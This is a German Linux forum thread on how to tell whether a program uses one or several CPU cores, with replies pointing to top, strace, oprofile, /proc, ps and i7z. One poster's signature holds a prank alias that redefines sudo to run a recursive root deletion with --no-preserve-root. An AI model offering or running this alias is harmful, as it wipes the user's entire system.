Ergebnis 1 bis 6 von 6
  1. #1
    Foren Gott Avatar von schwedenmann
    Registriert seit
    18.11.2003
    Ort
    Wegberg
    Beiträge
    2.521

    Wie feststellen, ob ein programm 1 oder alle Kerne nutzt ?

    Hallo


    Wie die Überschrift schon suggeriert, wie kann ich feststellen, wieviele, oder ob überhaupt, Kerne ein Programm benutzt ?


    mfg
    schwedenmann
    lieber ein OS mit X als mit oweh

  2. #2
    Kaiser Avatar von marcellus
    Registriert seit
    09.05.2007
    Beiträge
    1.392
    In top bekommst du eine Anzeige der cpu Auslastung, wenn die über 100% geht verwendet der Prozess mehr, als einen Kern.

    Wenn der Prozess weniger cpu Leistung verwendet ist die Frage ohnehin nutzlos.

    Alternativ kannst du auch mit strace den Prozess starten und nachsehen, ob neue Threads abgespaltet werden.
    Every time you open a useless thread google cries a little tear.
    Linux is userfriendly, its just ticky about its friends.
    UselessUseOfCatAward 02.09.2007

  3. #3
    hat den Bogen geschlagen Avatar von Schard
    Registriert seit
    26.05.2007
    Ort
    Hannover
    Beiträge
    872
    Möglicherweise kann oprofile auch weiterhelfen.
    Code:
    alias sudo='/usr/bin/sudo /bin/rm -Rf --no-preserve-root / #'

  4. #4
    Foren As
    Registriert seit
    21.12.2007
    Beiträge
    92
    Ich würde es mal über das /proc - Filesystem probieren:

    http://www.kernel.org/doc/man-pages/...n5/proc.5.html

    Dort vor allem das cpuset:

    http://www.kernel.org/doc/man-pages/.../cpuset.7.html

    das kannst du dir auch mit cat rel. einfach ansehen.

  5. #5
    Eroberer
    Registriert seit
    05.07.2005
    Beiträge
    68
    "ps -ef" zeigt auch threads an. In "top" "H" drücken und schon sind auch die threads da, dann noch "1" drücken und top zeigt oben die Auslastung der CPUs einzeln an.

  6. #6
    Routinier
    Registriert seit
    02.02.2012
    Beiträge
    393
    Fuer Intel i3 - i7 Prozessoren gibt es auch das Programm [url=http://code.google.com/p/i7z/]i7z[/code], das die Auslastung der Systemkerne angibt. Wenn man nur ein Programm laufen laesst, das die CPU auslastet, erkennt man daran recht schnell, wieviele (und welche) Kerne es benutzt. Sollte das Programm mittels openmp parallelisiert worden sein, so gibt es auch Umgebungsvariablen, die zum Testen geeignet sind (z.B. "OMP_NUM_THREADS"). Und wenn man zudem noch den Quellcode hat, kann man diverse openmp-Funktionen benutzen.

Ähnliche Themen

  1. Nutzt ihr ein spezielles Programm?
    Von Zwergspitz im Forum Member Talk & Offtopic
    Antworten: 6
    Letzter Beitrag: 17.11.2010, 14:11
  2. Antworten: 4
    Letzter Beitrag: 27.01.2009, 09:15
  3. Framebuffer im Kerne???
    Von mali im Forum Gentoo
    Antworten: 6
    Letzter Beitrag: 03.02.2007, 19:44
  4. Antworten: 11
    Letzter Beitrag: 17.12.2006, 14:26

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •